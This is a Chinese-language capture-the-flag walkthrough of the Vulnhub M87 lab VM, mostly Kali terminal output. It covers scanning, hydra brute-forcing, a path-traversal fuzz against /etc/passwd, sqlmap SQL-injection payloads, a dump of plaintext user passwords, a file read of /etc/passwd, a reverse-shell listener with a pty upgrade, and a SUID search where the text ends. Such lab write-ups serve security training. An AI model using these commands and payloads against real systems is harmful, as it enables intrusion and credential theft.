M87
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9e:f5:5c 1 60 PCS Systemtechnik GmbH
192.168.56.225 08:00:27:2c:7e:11 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.225
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.225 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 20:57 EST
Nmap scan report for localhost (192.168.56.225)
Host is up (0.00019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: M87 Login Form
|_http-server-header: Apache/2.4.38 (Debian)
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=M87/organizationName=662b442c19a840e482f9f69cde8f316e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2022-11-27T01:57:33
|_Not valid after: 2023-11-27T01:57:33
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.92%T=SSL%I=7%D=11/26%Time=6382C44C%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type
SF::\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-D
SF:NS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Con
SF:tent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-
SF:origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x2
SF:0<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=ut
SF:f-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=d
SF:evice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\
SF:x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatD
SF:isplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.666666
SF:67;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20
SF:#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:
SF:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:
SF:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-
SF:weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ma
SF:rgin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20
SF:request\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Enco
SF:ding:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\
SF:x20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Re
SF:source-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n
SF:<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</titl
SF:e>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"t
SF:ext/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport
SF:\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\
SF:x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fo
SF:nt-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20
SF:Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:font-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20li
SF:ne-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
MAC Address: 08:00:27:2C:7E:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.54 seconds
NMAP扫描结果表明目标主机有2个开放端口80(HTTP)、9090(HTTPS)
Get Access
访问80端口,返回登录页面,需要电子邮箱账号与密码。查看页面源代码,没有有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ curl http://192.168.56.225/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.225 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ gobuster dir -u http://192.168.56.225 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/26 21:04:40 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 316] [--> http://192.168.56.225/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.225/assets/]
/LICENSE (Status: 200) [Size: 1073]
/server-status (Status: 403) [Size: 279]
Progress: 217761 / 220561 (98.73%)===============================================================
2022/11/26 21:05:05 Finished
===============================================================
Gobuster工具扫描出来/admin目录,访问该目录,又是一个登录,但是这个登录需要通过GET方法提交,比较奇怪,隐约感觉是突破口。不过尝试用admin,password等提交,发现没有任何反应。
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ dirb http://192.168.56.225
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 26 21:11:01 2022
URL_BASE: http://192.168.56.225/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.225/ ----
==> DIRECTORY: http://192.168.56.225/admin/
==> DIRECTORY: http://192.168.56.225/assets/
+ http://192.168.56.225/index.html (CODE:200|SIZE:1322)
+ http://192.168.56.225/LICENSE (CODE:200|SIZE:1073)
+ http://192.168.56.225/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.225/admin/ ----
==> DIRECTORY: http://192.168.56.225/admin/backup/
==> DIRECTORY: http://192.168.56.225/admin/css/
==> DIRECTORY: http://192.168.56.225/admin/images/
+ http://192.168.56.225/admin/index.php (CODE:200|SIZE:4393)
==> DIRECTORY: http://192.168.56.225/admin/js/
---- Entering directory: http://192.168.56.225/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.225/admin/backup/ ----
+ http://192.168.56.225/admin/backup/index.php (CODE:200|SIZE:4412)
---- Entering directory: http://192.168.56.225/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.225/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.225/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 26 21:11:05 2022
DOWNLOADED: 13836 - FOUND: 5
用另一个工具dirb扫描,发现在/admin下有个backup目录,访问目录,是另个登录页面。
用hydras破解,通过抓包分析,请求方式是GET:
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 192.168.56.225 http-get /admin/backup
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-26 21:42:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.56.225:80/admin/backup
[80][http-get] host: 192.168.56.225 login: admin password: 123456
[STATUS] attack finished for 192.168.56.225 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-26 21:42:16
很快的就破解了密码123456,但是用这个密码登录,发现跟错误的密码返回信息是一样的,有点奇怪。
对了,还有个端口9090没有分析:
访问9090端口,返回页面是另一个登录页面。
看了别的人的做法,突破口还是在http://192.168.56.225/admin/页面
看一下能否FUZZ出参数?
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ wfuzz -c -u http://192.168.56.225/admin/?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 159
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.225/admin/?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002139: 200 84 L 188 W 4569 Ch "id"
既然参数名称是id,那可能就不是文件包含,看有没有SQL注入漏洞
访问:
http://192.168.56.225/admin/?id=1%27
返回错误:ou have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near ''' at
line 1
目标主机可能存在SQL注入漏洞,用SQLMAP跑一下:
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sqlmap --url 192.168.56.225/admin/?id=1
___
__H__
___ ___[']_____ ___ ___ {1.6.7#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:06:24 /2022-11-26/
[22:06:24] [INFO] testing connection to the target URL
[22:06:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:06:24] [INFO] testing if the target URL content is stable
[22:06:25] [INFO] target URL content is stable
[22:06:25] [INFO] testing if GET parameter 'id' is dynamic
[22:06:25] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:06:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:06:25] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[22:06:25] [INFO] testing for SQL injection on GET parameter 'id'
y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[22:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:06:34] [WARNING] reflective value(s) found and filtering out
[22:06:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:06:34] [INFO] testing 'Generic inline queries'
[22:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:06:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:06:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[22:06:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:06:35] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[22:06:35] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[22:06:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[22:06:36] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[22:06:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[22:06:37] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[22:06:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[22:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[22:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[22:06:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[22:06:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[22:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[22:06:37] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[22:06:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:06:38] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:06:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:06:38] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:06:38] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[22:06:38] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[22:06:39] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:06:39] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:06:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:06:39] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[22:06:39] [INFO] testing 'MySQL inline queries'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:06:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:06:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:06:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:06:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[22:06:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:06:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:06:49] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:06:49] [INFO] target URL appears to have 1 column in query
[22:06:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1185 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6900 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))onig)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x7176717071,0x434e59716b59724653715662757a654a55496c756a676348664b486a5368636e7772454b42744749,0x7171787071)-- -
---
[22:07:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:07:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.225'
[*] ending @ 22:07:00 /2022-11-26/
id参数确实存在SQL注入漏洞。
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sqlmap --url 192.168.56.225/admin/?id=1 -D db -T users -C username,password --dump
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:11:47 /2022-11-26/
[22:11:47] [INFO] resuming back-end DBMS 'mysql'
[22:11:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6900 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))onig)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x7176717071,0x434e59716b59724653715662757a654a55496c756a676348664b486a5368636e7772454b42744749,0x7171787071)-- -
---
[22:11:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:11:47] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'db'
Database: db
Table: users
[10 entries]
+----------+-----------------+
| username | password |
+----------+-----------------+
| jack | gae5g5a |
| ceo | 5t96y4i95y |
| brad | gae5g5a |
| expenses | 5t96y4i95y |
| julia | fw54vrfwe45 |
| mike | 4kworw4 |
| adrian | fw54vrfwe45 |
| john | 4kworw4 |
| admin | 15The4Dm1n4L1f3 |
| alex | dsfsrw4 |
+----------+-----------------+
[22:11:47] [INFO] table 'db.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.225/dump/db/users.csv'
[22:11:47] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.225'
[*] ending @ 22:11:47 /2022-11-26/
找到了这些用户名和密码,但是这些用户名和密码都不能
可以利用sqlmap读取文件
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sqlmap --url 192.168.56.225/admin/?id=1 -D db --file-read /etc/passwd
___
__H__
___ ___[.]_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:13:33 /2022-11-26/
[22:13:33] [INFO] resuming back-end DBMS 'mysql'
[22:13:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6900 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(6900=6900,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8702 FROM (SELECT(SLEEP(5)))onig)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x7176717071,0x434e59716b59724653715662757a654a55496c756a676348664b486a5368636e7772454b42744749,0x7171787071)-- -
---
[22:13:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:13:33] [INFO] fingerprinting the back-end DBMS operating system
[22:13:33] [INFO] the back-end DBMS operating system is Linux
[22:13:33] [INFO] fetching file: '/etc/passwd'
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[22:13:40] [INFO] the local file '/home/kali/.local/share/sqlmap/output/192.168.56.225/files/_etc_passwd' and the remote file '/etc/passwd' have the same size (1786 B)
files saved to [1]:
[*] /home/kali/.local/share/sqlmap/output/192.168.56.225/files/_etc_passwd (same file)
[22:13:40] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.225'
[*] ending @ 22:13:40 /2022-11-26/
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ ls
bg-01.jpg nmap_full_scan req.txt
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ cat /home/kali/.local/share/sqlmap/output/192.168.56.225/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
Debian-exim:x:109:116::/var/spool/exim4:/usr/sbin/nologin
cockpit-ws:x:110:117::/nonexisting:/usr/sbin/nologin
cockpit-wsinstance:x:111:118::/nonexisting:/usr/sbin/nologin
将所有用户和密码收集起来使用burp进行爆破, 最后使用charlotte:15The4Dm1n4L1f3登录9090端口的首页
提权
┌──(kali㉿kali)-[~/Vulnhub/M87]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.225] 33882
id
uid=1000(charlotte) gid=1000(charlotte) groups=1000(charlotte),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
charlotte@M87:~$ ls
ls
local.txt
charlotte@M87:~$ cat local.txt
cat local.txt
29247ebdec52ba0b9a6fd10d68f6b91f
charlotte@M87:~$ ls -alh
ls -alh
total 32K
drwxr-xr-x 3 charlotte charlotte 4.0K Nov 6 2020 .
drwxr-xr-x 3 root root 4.0K Nov 6 2020 ..
lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 charlotte charlotte 220 Nov 6 2020 .bash_logout
-rw-r--r-- 1 charlotte charlotte 3.5K Nov 6 2020 .bashrc
drwx------ 3 charlotte charlotte 4.0K Nov 26 22:15 .gnupg
-rw------- 1 charlotte charlotte 33 Nov 6 2020 local.txt
-rw-r--r-- 1 charlotte charlotte 807 Nov 6 2020 .profile
-rw------- 1 charlotte charlotte 49 Nov 6 2020 .Xauthority
charlotte@M87:~$ sudo -l
sudo -l
[sudo] password for charlotte: 15The4Dm1n4L1f3
Sorry, user charlotte may not run sudo on M87.
charlotte@M87:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/exim4
/usr/bin/watch
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/rsync
